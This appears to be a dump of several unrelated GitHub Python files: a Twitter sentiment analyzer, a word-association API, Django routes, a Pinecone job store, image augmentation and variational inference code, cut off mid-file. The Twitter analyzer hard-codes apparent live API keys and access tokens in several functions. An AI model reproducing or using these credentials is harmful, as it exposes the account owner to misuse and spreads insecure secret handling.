word_tokenize(document)\n features = {}\n for w in all_words:\n features[w] = (w in words)\n return features\n\n\ndef make_wordcloud(lst):\n lst = [item.lower() for item in lst]\n new_stopwords = {\"today\", \"watch\", \"people\", \"amp\", \"time\", \"day\", \"week\", \"people\",\"year\",\"S\"}\n stopwords = set(STOPWORDS)\n stopwords = stopwords.union(new_stopwords)\n wordcloud = WordCloud(width = 800, height = 800,\n background_color ='black',\n stopwords = stopwords,\n min_font_size = 10).generate(\" \".join(lst))\n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.show()\n a1, a2, a3 = st.beta_columns((2,1,1))\n a1.pyplot()\n\n\ndef nam_adj(df):\n names, adjectives, nouns, adverbs = [],[],[],[]\n for twt in df[\"Tweet\"]:\n words = word_tokenize(twt)\n pairs = nltk.pos_tag(words)\n for pair in pairs:\n if pair[1] == \"NNP\":\n names.append(pair[0])\n elif pair[1] == \"JJ\" or pair[1] ==\"JJS\" or pair[1] == \"JJR\" :\n adjectives.append(pair[0])\n elif pair[1] == \"NN\" or pair[1] == \"NNS\":\n nouns.append(pair[0])\n elif pair[1] == \"RB\" or pair[1] == \"RBR\" or pair[1] == \"RBS\":\n adverbs.append(pair[0])\n return names,adjectives,nouns,adverbs\n\n\n\n\n\ndef make_wordcloud_df(df): \n words = []\n new_stopwords = {\"today\", \"watch\", \"people\", \"amp\", \"time\", \"day\", \"week\", \"people\",\"year\", \"S\"}\n stopwords = set(STOPWORDS)\n stopwords = stopwords.union(new_stopwords)\n for twt in df.Tweet:\n tokens = twt.split()\n\n for i in range(len(tokens)):\n tokens[i] = tokens[i].lower()\n words.append(tokens[i])\n \n wordcloud = WordCloud(width = 800, height = 800,\n background_color ='black',\n stopwords = stopwords,\n min_font_size = 10).generate(\" \".join(words))\n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.show()\n a1, a2, a3 = st.beta_columns((2,1,1))\n a1.subheader(\"General word cloud\")\n a1.pyplot()\n\ndef getSubjectivity(text):\n return TextBlob(text).sentiment.subjectivity\n\n\ndef sentiment_textblob(text):\n if TextBlob(text).sentiment.polarity > 0:\n return \"pos\"\n elif TextBlob(text).sentiment.polarity < 0:\n return \"neg\"\n return \"neutral\"\n\ndef user_tweets(username, tweets):\n consumer_key = 'j5z6oTkkODllydAv4TJa8FxJS'\n consumer_secret = 'rSig6RvaLe2v8GzrsNsFpirLF2OKVxKune1NqXMuY8JV42RmKv'\n access_token = '1010014270845698050-rNQS8lrmTbzgMWpNI1khQA3xUSNMEK'\n access_token_secret = 'n4Jql8f1ao1McHKg5FQHQxTq1vV9ykcPI9hXBIp0CQKFn'\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth)\n tweets = api.user_timeline(username, count=tweets, tweet_mode='extended')\n df = pd.DataFrame([tweet.full_text for tweet in tweets], columns=['Tweet'])\n df[\"Tweet\"] = df[\"Tweet\"].apply(cleanTxt)\n return df\n\n\ndef user_data(user, tweets):\n df = user_tweets(user, int(tweets))\n #st.write(df)\n df['Sentiment'] = df['Tweet'].apply(sentiment_textblob)\n df['Subjectivity'] = df['Tweet'].apply(getSubjectivity)\n st.subheader(\"Tweets\")\n st.write(df)\n \n df1 = df.groupby('Sentiment').count()\n sub_mean = df[\"Subjectivity\"].mean()\n \n \n #st.write(df1.loc(0)[\"pos\"]['Tweet'])\n #st.write(df1.loc(0)[\"neg\"]['Tweet'])\n #st.write(df1.loc(0)[\"neutral\"]['Tweet'])\n try:\n pos = df1.loc(0)[\"pos\"][\"Tweet\"]\n except:\n pos = 0\n try:\n neg = df1.loc(0)[\"neg\"][\"Tweet\"]\n except:\n neg = 0\n try:\n neutral = df1.loc(0)[\"neutral\"][\"Tweet\"]\n except:\n neutral = 0\n s1,s2,s3 = st.beta_columns((1,1,1))\n s1.success(\"pos: {}\".format(pos))\n s2.error(\"neg: {}\".format(neg))\n s3.info(\"neutral: {}\".format(neutral))\n # y = np.array([pos,neg,neutral])\n \n # labels = [\"pos\",\"neg\",\"neutral\"]\n # st.header(\"Percentage of tweets \")\n # fig = px.pie(values = y, names = labels)\n # st.plotly_chart(fig)\n #make_wordcloud_df(df)\n names, adjectives, nouns, adverbs = nam_adj(df)\n a1, a2, a3 = st.beta_columns((2,1,2))\n a1.subheader(\"Names talked about : \")\n #make_wordcloud(names)\n lst = [item.lower() for item in names]\n new_stopwords = {\"today\", \"watch\", \"people\", \"amp\", \"time\", \"day\", \"week\", \"people\",\"year\",\"S\"}\n stopwords = set(STOPWORDS)\n stopwords = stopwords.union(new_stopwords)\n wordcloud = WordCloud(width = 800, height = 800,\n background_color ='black',\n stopwords = stopwords,\n min_font_size = 10).generate(\" \".join(lst))\n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.show() \n a1.pyplot()\n a3.subheader(\"Things talked about : \")\n #make_wordcloud(nouns)\n lst = [item.lower() for item in nouns]\n new_stopwords = {\"today\", \"watch\", \"people\", \"amp\", \"time\", \"day\", \"week\", \"people\",\"year\",\"S\"}\n stopwords = set(STOPWORDS)\n stopwords = stopwords.union(new_stopwords)\n wordcloud = WordCloud(width = 800, height = 800,\n background_color ='black',\n stopwords = stopwords,\n min_font_size = 10).generate(\" \".join(lst))\n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.show() \n a3.pyplot()\n \n \n \ndef user_data_naive(user, tweets):\n df = user_tweets(user, int(tweets))\n #st.write(df)\n df['Sentiment'] = df['Tweet'].apply(tw_sentiment)\n #df['Subjectivity'] = df['Tweet'].apply(getSubjectivity)\n st.subheader(\"Tweets\")\n st.write(df)\n df1 = df.groupby('Sentiment').count()\n #sub_mean = df[\"Subjectivity\"].mean()\n #st.write(\"Factuality percentage : {} \".format((1-sub_mean)*100))\n #st.write(df1.loc(0)[\"pos\"]['Tweet'])\n #st.write(df1.loc(0)[\"neg\"]['Tweet'])\n #st.write(df1.loc(0)[\"neutral\"]['Tweet'])\n try:\n pos = df1.loc(0)[\"pos\"][\"Tweet\"]\n except:\n pos = 0\n try:\n neg = df1.loc(0)[\"neg\"][\"Tweet\"]\n except:\n neg = 0\n try:\n neutral = df1.loc(0)[\"neutral\"][\"Tweet\"]\n except:\n neutral = 0\n s1,s2,s3 = st.beta_columns((1,1,1))\n s1.success(\"pos: {}\".format(pos))\n s2.error(\"neg: {}\".format(neg))\n s3.info(\"neutral: {}\".format(neutral))\n y = np.array([pos,neg,neutral])\n \n # labels = [\"pos\",\"neg\",\"neutral\"]\n # st.header(\"Percentage of tweets \")\n # fig = px.pie(values = y, names = labels)\n # st.plotly_chart(fig)\n #make_wordcloud_df(df)\n names, adjectives, nouns, adverbs = nam_adj(df)\n a1, a2, a3 = st.beta_columns((2,1,2))\n a1.subheader(\"Names talked about : \")\n #make_wordcloud(names)\n lst = [item.lower() for item in names]\n new_stopwords = {\"today\", \"watch\", \"people\", \"amp\", \"time\", \"day\", \"week\", \"people\",\"year\",\"S\"}\n stopwords = set(STOPWORDS)\n stopwords = stopwords.union(new_stopwords)\n wordcloud = WordCloud(width = 800, height = 800,\n background_color ='black',\n stopwords = stopwords,\n min_font_size = 10).generate(\" \".join(lst))\n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.show() \n a1.pyplot()\n a3.subheader(\"Things talked about : \")\n #make_wordcloud(nouns)\n lst = [item.lower() for item in nouns]\n new_stopwords = {\"today\", \"watch\", \"people\", \"amp\", \"time\", \"day\", \"week\", \"people\",\"year\",\"S\"}\n stopwords = set(STOPWORDS)\n stopwords = stopwords.union(new_stopwords)\n wordcloud = WordCloud(width = 800, height = 800,\n background_color ='black',\n stopwords = stopwords,\n min_font_size = 10).generate(\" \".join(lst))\n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.show() \n a3.pyplot()\n \ndef live_stream(word, number_of_tweets):\n #consumer key, consumer secret, access token, access secret.\n ckey=\"43Py8H7TanGk8MsQa4OQrPkXh\"\n csecret=\"f34JoWamtLjpCqwbqxm6Ml5tDDMoyb432rkLycqH3ot3sfLHVK\"\n atoken=\"1010014270845698050-bo929URvOonltIawK5m9EiOBXDFQyW\"\n asecret=\"vWP0kHUJlqrUwRtJMH32QGcwTVcHlBingfmkJfrzFzPgH\"\n\n\n class listener(StreamListener):\n def __init__(self, num_tweets_to_grab):\n self.counter = 0\n self.num_tweets_to_grab = num_tweets_to_grab\n self.lst = []\n \n\n\n def on_data(self, data):\n all_data = json.loads(data)\n tweet = all_data[\"text\"]\n sentiment = sentiment_textblob(tweet)\n print(tweet, sentiment)\n output = open(\"twitter-out3.txt\",\"a\")\n output.write(sentiment)\n output.write(\"\\n\")\n self.counter += 1\n\n if self.counter == self.num_tweets_to_grab:\n return False\n\n return True\n\n def on_error(self, status):\n print(status)\n\n auth = OAuthHandler(ckey, csecret)\n auth.set_access_token(atoken, asecret)\n #progress = stqdm(range(int(number_of_tweets)))\n \n twitterStream = Stream(auth, listener(number_of_tweets))\n twitterStream.filter(track=[word])\n \n \n \n\n\n\n\ndef analyse():\n user = st.text_input(\"Eneter the username of the twitter user :\")\n #tweets = st.number_input(\"Enter the number of tweets you want to analyse:\")\n tweets = st.slider(\"Enter the number of tweets you want to analyse:\",10,200,10)\n \n button = st.button(\"Analyse\")\n if button:\n user_data(user, tweets)\n\ndef analyse_naive():\n user = st.text_input(\"Eneter the username of the twitter user :\")\n tweets = st.slider(\"Enter the number of tweets you want to analyse:\",10,200,10)\n button = st.button(\"Analyse\")\n if button:\n user_data_naive(user, tweets)\n\n \ndef ps():\n st.subheader(\"Live sentiment analyzer\")\n word = st.text_input(\"Enter the word for which you want to get the public sentiment\")\n twts = st.slider(\"Enter the number of tweets you want to fetch\",10,10000,10)\n button = st.button(\"Fetch\")\n if button:\n live_stream(word, twts)\n style.use(\"ggplot\")\n\n fig = plt.figure()\n ax1 = fig.add_subplot(1,1,1)\n \n pullData = open(\"twitter-out3.txt\",\"r\").read()\n lines = pullData.split('\\n')\n \n xar = []\n yar = []\n \n x = 0\n y = 0\n \n for l in lines:\n x += 1\n if \"pos\" in l:\n y += 1\n elif \"neg\" in l:\n y -= 1\n elif \"neutral\" in l:\n pass\n \n xar.append(x)\n yar.append(y)\n \n ax1.clear()\n ax1.plot(xar,yar)\n #ani = animation.FuncAnimation(fig, animate, interval=1)\n plt.show()\n st.pyplot()\n os.remove(\"twitter-out3.txt\")\n \n \n\n\ndef main():\n consumer_key = 'j5z6oTkkODllydAv4TJa8FxJS'\n consumer_secret = 'rSig6RvaLe2v8GzrsNsFpirLF2OKVxKune1NqXMuY8JV42RmKv'\n access_token = '1010014270845698050-rNQS8lrmTbzgMWpNI1khQA3xUSNMEK'\n access_token_secret = 'n4Jql8f1ao1McHKg5FQHQxTq1vV9ykcPI9hXBIp0CQKFn'\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth)\n st.set_option('deprecation.showPyplotGlobalUse', False)\n st.title(\" Twitter Analyzer \")\n st.sidebar.title(\" Choose Option : \")\n classifier = st.sidebar.selectbox(\"\", (\"Profile Analysis\",\"Profile Analysis (N.B)\", \"Live Sentiment Tracker\" ))\n #if st.sidebar.checkbox(\"Analyse a twitter account : \", key = \"a\"):\n if classifier == \"Profile Analysis\":\n analyse()\n elif classifier == \"Profile Analysis (N.B)\":\n analyse_naive()\n elif classifier == \"Live Sentiment Tracker\":\n ps()\n \n \n \n \nif __name__ == '__main__':\n main()\n \n ","repo_name":"kafka-654/twitter_analyzer","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":13667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29889861334","text":"\"\"\"API for getting political word associations\"\"\"\nimport hug\nimport gensim\n\nmodel_dir = \"/opt/sv_polit_word/models/\"\nvalid_parties =[ \"KD\", \"L\", \"M\", \"MP\", \"S\", \"SD\", \"V\", \"FP\", \"C\" ]\n\n#@hug.local()\n@hug.get('/sv_polit_word', output=hug.output_format.json, examples=\"party=S&word=sverige\")\ndef sv_polit_word(party:hug.types.one_of(valid_parties), word:hug.types.text):\n \"\"\" Political word associations by party\"\"\"\n mdl = gensim.models.Word2Vec.load(model_dir + party + \".model\")\n initial_word_list = \"\"\n try:\n initial_word_list = mdl.most_similar(word, topn=25)\n except:\n return {'errors': (\"'\" + word + \"': not enough data for model \" + party + \"\")}\n result_words = []\n for result in initial_word_list:\n # eg: [ {'text': 'landet', 'size': 57 } , {'text':'framtiden', 'size': 30} ]\n result_words.append( {'text': result[0], 'size': round(result[1] * 100) } )\n return { 'result': result_words }\n\n","repo_name":"nimishgautam/politician-words-sv","sub_path":"backend/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72924457794","text":"#!/usr/bin/env python\n# coding: utf-8\nfrom django.conf.urls import url\nfrom company import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^faq$', views.faq),\n url(r'^faq/(?P\\d{1,15})$', views.faq_cat_detail),\n url(r'^about$', views.about),\n url(r'^about/(?P\\d{1,15})$', views.about_cat_detail),\n url(r'^service$', views.service),\n url(r'^service/(?P\\d{1,15})$', views.service_cat_detail),\n url(r'^product$', views.products),\n url(r'^product/(?P\\d{1,15})$', views.product_cat_detail),\n url(r'^download$', views.download),\n url(r'^download/(?P\\d{1,15})$', views.download_cat_detail),\n url(r'^news/$', views.news),\n url(r'^news/(?P\\d{1,15})$', views.news_detail),\n \n]\n","repo_name":"guishende/gitPublic","sub_path":"web/webshare/company/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1245592704","text":"n1=input('请输入中文名字:')\r\nn2=input('请输入英文名字:')\r\nn3=input('请输入英文成绩:')\r\nn4=input('请输入数学成绩:')\r\nn5=int(n3)+int(n4)\r\nprint('{0}({1:<})欢迎使用本系统'.format(n1,n2))\r\nprint('{0}({1:<})你的总分是{2}'.format(n1,n2,n5))\r\nx=open('out1.txt',mode='w')\r\nprint('{0}({1:<})欢迎使用本系统'.format(n1,n2),file=x)\r\nprint('{0}({1:<})你的总分是{2}'.format(n1,n2,n5),file=x)\r\nx.close()","repo_name":"yvvvvvvvv/Scu_","sub_path":"Scu_Level1-1/Programming/20211118/10173116-2.py","file_name":"10173116-2.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40283087904","text":"import pinecone\nfrom dotenv import load_dotenv, find_dotenv\nimport os\n#\n# pinecone.init(api_key=\"YOUR_API_KEY\",\n# environment=\"us-east1-gcp\")\n\nload_dotenv(find_dotenv())\n\nclass JobStore:\n\n\n def __init__(self, environment, index_name, namespace):\n pinecone.init(api_key=os.environ.get(\"PINECONE_KEY\"), environment=environment)\n self.index = pinecone.Index(index_name)\n self.namespace = namespace\n self.jobs = []\n\n def get_k_nearest_jobs(self, embedding, k):\n query_response = self.index.query(\n namespace=self.namespace,\n top_k=k,\n include_values=True,\n include_metadata=True,\n vector=embedding\n )\n return query_response","repo_name":"renrut/jobs-app-backend","sub_path":"data/JobStore.py","file_name":"JobStore.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15352773026","text":"# Alternate letters in uppercase\n# A str‌ing (only alphabets) is passed as input. The printed output should contain alphabets in odd positions in each word in uppercase and alphabets in even positions in a word in lowercase.\n\n# Example input and output:\n\n# If the input is 'tREE GiVES us fruiTS', the output should be 'TrEe GiVeS Us FrUiTs'\n# If the input is 'FLoweR iS beauTIFUL', the output should be 'FlOwEr Is BeAuTiFuL'\n\n\n\n\n\n\nx = list(input().split())\nfor s in x:\n s = list(s)\n for i in range(len(s)):\n if i%2: s[i]=s[i].lower()\n else: s[i]=s[i].upper()\n print(''.join(s),end=' ')","repo_name":"Logesh08/Programming-Daily-Challenges","sub_path":"Alternate letters in uppercase.py","file_name":"Alternate letters in uppercase.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22770302830","text":"import cv2\nimport mxnet as mx\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\n\n\ndef crop_augmentation(joint, crop_width, crop_height):\n # Random crop\n # Watch out: weight before height in size param!\n aug = mx.image.RandomCropAug(size=(crop_width, crop_height))\n aug_joint = aug(joint)\n # Deterministic resize\n ratio = 0.7\n resize_size = int(min(crop_width, crop_height)*ratio)\n aug = mx.image.ResizeAug(resize_size)\n aug_joint = aug(aug_joint)\n # Add more translation/scale/rotation augmentations her\n return aug_joint\n\n\ndef color_augmentation_bright(base):\n # Only applied to the base image, and not the mask layers.\n aug = mx.image.BrightnessJitterAug(brightness=0.5)\n aug_base = aug(base)\n # Add more color augmentations here...\n return aug_base\n\n\ndef color_augmentation_contrast(base):\n aug = mx.image.ContrastJitterAug(contrast=0.5)\n aug_base = aug(base)\n return aug_base\n\n\ndef horizontal_flip(base):\n aug = mx.image.HorizontalFlipAug(p=1)\n aug_base = aug(base)\n return aug_base\n\n\ndef vertical_flip(base):\n aug = mx.image.HorizontalFlipAug(p=1)\n aug_base = aug(base.swapaxes(0, 1)).swapaxes(0, 1)\n return aug_base\n\n\ndef joint_transform(image, mask):\n aug_base_list, aug_mask_list = [], []\n # Convert types\n image = image.astype('float32')/255\n mask = mask.astype('float32')/255\n\n mx_image = mx.nd.array(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n mx_mask = mx.nd.array(mask)\n # Join\n # Concatinate on channels dim, to obtain an 6 channel image\n # (3 channels for the base image, plus 3 channels for the mask)\n base_channels = mx_image.shape[2] # so we know where to split later on\n joint = mx.nd.concat(mx_image, mx_mask, dim=2)\n\n # Augmentation Part 1: positional\n (h, w) = image.shape[:2]\n aug_joint = crop_augmentation(joint, int(w*0.5), int(h*0.5))\n # Split\n aug_base = aug_joint[:, :, :base_channels]\n aug_mask = aug_joint[:, :, base_channels:]\n aug_base_list.append(aug_base)\n aug_mask_list.append(aug_mask)\n\n # Augmentation Part 1-1: positional again\n aug_joint = crop_augmentation(joint, int(w*0.75), int(h*0.75))\n # Split\n aug_base = aug_joint[:, :, :base_channels]\n aug_mask = aug_joint[:, :, base_channels:]\n aug_base_list.append(aug_base)\n aug_mask_list.append(aug_mask)\n\n # Augmentation 2: color brightness\n aug_base = color_augmentation_bright(mx_image.copy())\n aug_base_list.append(aug_base)\n aug_mask_list.append(mx_mask)\n\n # Augmentation 3: color contrast\n aug_base = color_augmentation_contrast(mx_image.copy())\n aug_base_list.append(aug_base)\n aug_mask_list.append(mx_mask)\n\n # Augmentation 4: horizontal flip\n aug_joint = horizontal_flip(joint)\n aug_base = aug_joint[:, :, :base_channels]\n aug_mask = aug_joint[:, :, base_channels:]\n aug_base_list.append(aug_base)\n aug_mask_list.append(aug_mask)\n\n # # Augmentation 5: vertical flip\n aug_joint = vertical_flip(joint)\n aug_base = aug_joint[:, :, :base_channels]\n aug_mask = aug_joint[:, :, base_channels:]\n aug_base_list.append(aug_base)\n aug_mask_list.append(aug_mask)\n\n # # Augmentation 6: rotate\n (h, w) = image.shape[:2]\n M = cv2.getRotationMatrix2D((w/2, h/2), 30, 1.0)\n aug_base = cv2.warpAffine(image, M, (w, h))\n aug_mask = cv2.warpAffine(mask, M, (w, h))\n aug_base = mx.nd.array(cv2.cvtColor(aug_base, cv2.COLOR_BGR2RGB))\n aug_mask = mx.nd.array(aug_mask)\n aug_base_list.append(aug_base)\n aug_mask_list.append(aug_mask)\n M = cv2.getRotationMatrix2D((w/2, h/2), 120, 1.0)\n aug_base = cv2.warpAffine(image, M, (w, h))\n aug_mask = cv2.warpAffine(mask, M, (w, h))\n aug_base = mx.nd.array(cv2.cvtColor(aug_base, cv2.COLOR_BGR2RGB))\n aug_mask = mx.nd.array(aug_mask)\n aug_base_list.append(aug_base)\n aug_mask_list.append(aug_mask)\n\n return aug_base_list, aug_mask_list\n\n\ndef plot_mx_arrays(arrays):\n \"\"\"\n Array expected to be height x width x 3 (channels), and values are floats between 0 and 255.\n \"\"\"\n plt.subplots(figsize=(12, 4))\n row_num = len(arrays)\n col_num = len(arrays[0])\n print('Row=', row_num, ' Col=', col_num)\n for ri, sub_arrays in enumerate(arrays):\n for idx, array in enumerate(sub_arrays):\n assert array.shape[2] == 3, \"RGB Channel should be last\"\n plt.subplot(row_num, col_num, idx+1+col_num*ri)\n # make sure array type equals to mxnet ndarray\n plt.imshow((array.clip(0, 255)/255).asnumpy())\n plt.savefig('augment.png')\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Data augmentation')\n parser.add_argument('--imgdir', dest='data_dir', type=str, default=None, required=True,\n help='Root directory of data. Note that there must be subfolder image/ and mask/ under the directory.')\n parser.add_argument('--log', action='store_true', default=False,\n help='Decide to or not to print logging information. (default: fasle)')\n args = parser.parse_args()\n\n image_dir = args.data_dir + \"image/\"\n mask_dir = args.data_dir + \"mask/\"\n img_paths = sorted(\n [image_dir + img_name for img_name in os.listdir(image_dir)])\n mask_paths = sorted(\n [mask_dir + mask_name for mask_name in os.listdir(mask_dir)])\n\n count = 1\n save_dir = args.data_dir[:-1] + '_Augmented/'\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n os.mkdir(save_dir+'image/')\n os.mkdir(save_dir+'mask/')\n for img_path, mask_path in zip(img_paths, mask_paths):\n if(args.log):\n print(img_path, mask_path)\n image = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n trans_imgs, trans_masks = joint_transform(image, mask)\n mx_image = mx.nd.array(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n mx_mask = mx.nd.array(mask)\n output_images = [mx_image.astype('float32')]\n output_images += [img*255 for img in trans_imgs]\n output_masks = [mx_mask.astype('float32')]\n output_masks += [msk*255 for msk in trans_masks]\n # plot_mx_arrays([output_images, output_masks])\n # break\n for image, mask in zip(output_images, output_masks):\n # image = cv2.cvtColor(np.float32(image), cv2.COLOR_RGB2BGR)\n cv2.imwrite('%simage/%04d.png' %\n (save_dir, count), cv2.cvtColor(image.asnumpy(), cv2.COLOR_RGB2BGR))\n # mask = cv2.cvtColor(mask.astype('uint8'), cv2.COLOR_RGB2BGR)\n cv2.imwrite('%smask/%04d.png' %\n (save_dir, count), mask.asnumpy())\n count += 1\n","repo_name":"huhuman/crack-segmentation","sub_path":"utils/data_augmentation.py","file_name":"data_augmentation.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15888795939","text":"from tensorflow.keras.applications.resnet50 import ResNet50\nimport os\n\n\ndef get_model():\n return ResNet50(weights='imagenet')\n\n\ndef main():\n model = get_model()\n save_path = os.path.join(os.path.dirname(__file__), 'model', 'resnet50.h5')\n dir_name = os.path.dirname(save_path)\n os.makedirs(dir_name, exist_ok=True)\n model.save(save_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Adlik/Adlik","sub_path":"benchmark/tests/test_model/resnet50_keras/resnet50_keras.py","file_name":"resnet50_keras.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":702,"dataset":"github-code","pt":"61"} +{"seq_id":"72329611715","text":"import numpy as np\nimport tensorflow_probability as tfp\nfrom tensorflow_probability import bijectors as tfb\nimport tensorflow as tf\nfrom tensorflow_probability.python.vi import csiszar_divergence\ntfd = tfp.distributions\nfrom functools import partial\nimport matplotlib.pyplot as plt\nfrom tensorflow_probability.python.internal import nest_util\n\nfrom qvi.core.distribution import get_gaussian_quantization_weights\nfrom qvi.misc.utils import split_to_nested_tensors\n\n\nDTYPE = tf.float32\n_reparameterized_elbo = partial(\n csiszar_divergence.monte_carlo_variational_loss,\n discrepancy_fn=csiszar_divergence.kl_reverse,\n use_reparameterization=True)\n\nimport tensorflow_probability as tfp\nimport tensorflow as tf\nfrom tensorflow_probability.python.vi import csiszar_divergence\ntfd = tfp.distributions\nfrom functools import partial\n_reparameterized_elbo = partial(\n csiszar_divergence.monte_carlo_variational_loss,\n discrepancy_fn=csiszar_divergence.kl_reverse,\n use_reparameterization=True)\n\nclass VariationalInference:\n def __init__(self,\n target_log_prob_fn,\n surrogate_posterior, \n sample_size,\n variational_loss_fn,\n optimizer,\n num_steps,\n trace_fn=None,\n name=''):\n self.target_log_prob_fn=target_log_prob_fn\n self.surrogate_posterior=surrogate_posterior\n self.trace_fn=trace_fn\n self.optimizer=optimizer\n self.num_steps=num_steps\n self.variational_loss_fn=variational_loss_fn\n self.trainable_variables=surrogate_posterior.trainable_variables\n self.sample_size=sample_size\n self.name = name\n \n def run(self):\n #pbar = tqdm(total=num_steps)\n self.trace = tfp.vi.fit_surrogate_posterior(\n target_log_prob_fn=self.target_log_prob_fn,\n surrogate_posterior=self.surrogate_posterior,\n trace_fn=self.trace_fn,\n optimizer=self.optimizer,\n num_steps=self.num_steps,\n variational_loss_fn=self.variational_loss_fn,\n trainable_variables=self.trainable_variables,\n sample_size=self.sample_size)\n \n def plot(self, abscissa='time',name=''):\n loss, timestamps, grads = self.trace\n if abscissa == 'time':\n x = timestamps - timestamps[0]\n elif abscissa == 'epochs':\n x = np.arange(0,len(loss))\n plt.plot(x, -loss, label=name)\n \n\nclass MCVariationalInference(VariationalInference):\n def __init__(self,\n target_log_prob_fn,\n surrogate_posterior, \n sample_size,\n optimizer,\n trace_fn,\n num_steps,\n name=''):\n super().__init__(target_log_prob_fn=target_log_prob_fn,\n surrogate_posterior=surrogate_posterior, \n sample_size=sample_size,\n variational_loss_fn=vi_mc,\n optimizer=optimizer,\n num_steps=num_steps,\n trace_fn=trace_fn,\n name='')\n\nclass RQMCVariationalInference(VariationalInference):\n def __init__(self,\n target_log_prob_fn,\n surrogate_posterior, \n sample_size,\n optimizer,\n trace_fn,\n num_steps,\n name=''):\n super().__init__(target_log_prob_fn=target_log_prob_fn,\n surrogate_posterior=surrogate_posterior, \n sample_size=sample_size,\n variational_loss_fn=vi_mc,\n optimizer=optimizer,\n num_steps=num_steps,\n trace_fn=trace_fn,\n name='')\n\n \nclass QuantizedVariationalInference(VariationalInference):\n def __init__(self,\n target_log_prob_fn,\n surrogate_posterior, \n sample_size,\n optimizer,\n trace_fn,\n num_steps,\n D,\n name=''):\n \n self.D = D\n \n super().__init__(target_log_prob_fn=target_log_prob_fn,\n surrogate_posterior=surrogate_posterior, \n sample_size=sample_size,\n variational_loss_fn=partial(vi_quantized, seed=None, K='', D=self.D),\n optimizer=optimizer,\n num_steps=num_steps,\n trace_fn=trace_fn,\n name='')\n \nclass QuantizedRichardsonVariationalInference(VariationalInference):\n def __init__(self,\n target_log_prob_fn,\n surrogate_posterior, \n sample_size,\n optimizer,\n num_steps,\n trace_fn,\n D,\n M,\n name=''):\n \n self.D = D\n self.M = M\n \n super().__init__(target_log_prob_fn=target_log_prob_fn,\n surrogate_posterior=surrogate_posterior, \n sample_size=sample_size,\n variational_loss_fn=partial(vi_quantized_richardson, seed=None, D=self.D, M=self.M),\n optimizer=optimizer,\n num_steps=num_steps,\n trace_fn=trace_fn,\n name='')\n \ndef vi_quantized_richardson(target_log_prob_fn,\n surrogate_posterior,\n sample_size,\n seed,\n D,\n M):\n \n #N value is sample_size\n N = sample_size\n \n def q_divergence(sample_size):\n q_samples = surrogate_posterior.sample(sample_size)\n surrogate_posterior_log_prob = surrogate_posterior.log_prob(q_samples)\n target_log_prob = nest_util.call_fn(partial(target_log_prob_fn), q_samples)\n weights = get_gaussian_quantization_weights(shape= (sample_size,D), dtype=tf.float32)\n divergence = tfp.vi.kl_reverse(target_log_prob - surrogate_posterior_log_prob)\n return tf.tensordot(weights,divergence, axes=1)\n \n divN = tf.reduce_sum(q_divergence(N))\n divM = tf.reduce_sum(q_divergence(M))\n power = tf.constant(2.)\n coeff_pow = D\n\n reg_M = tf.math.pow(tf.cast(M,dtype=DTYPE),power/coeff_pow)\n reg_N = tf.math.pow(tf.cast(N,dtype=DTYPE),power/coeff_pow)\n elbo = ( reg_N * divN - reg_M * divM)/(reg_N - reg_M)\n return elbo\n\n\ndef vi_quantized(target_log_prob_fn,\n surrogate_posterior,\n sample_size,\n seed,\n D,\n K):\n q_samples = surrogate_posterior.sample(sample_size)\n \n surrogate_posterior_log_prob = surrogate_posterior.log_prob(q_samples)\n target_log_prob = nest_util.call_fn(partial(target_log_prob_fn), q_samples)\n weights = get_gaussian_quantization_weights(shape= (sample_size,D), dtype=tf.float32)\n divergence = tfp.vi.kl_reverse(target_log_prob - surrogate_posterior_log_prob)\n elbo = tf.reduce_sum(tf.tensordot(weights,divergence, axes=1))\n\n #tf.print(elbo)\n return elbo\n\ndef vi_mc(target_log_prob_fn,\n surrogate_posterior,\n sample_size,\n seed=None):\n q_samples = surrogate_posterior.sample(sample_size)\n \n surrogate_posterior_log_prob = surrogate_posterior.log_prob(q_samples)\n target_log_prob = 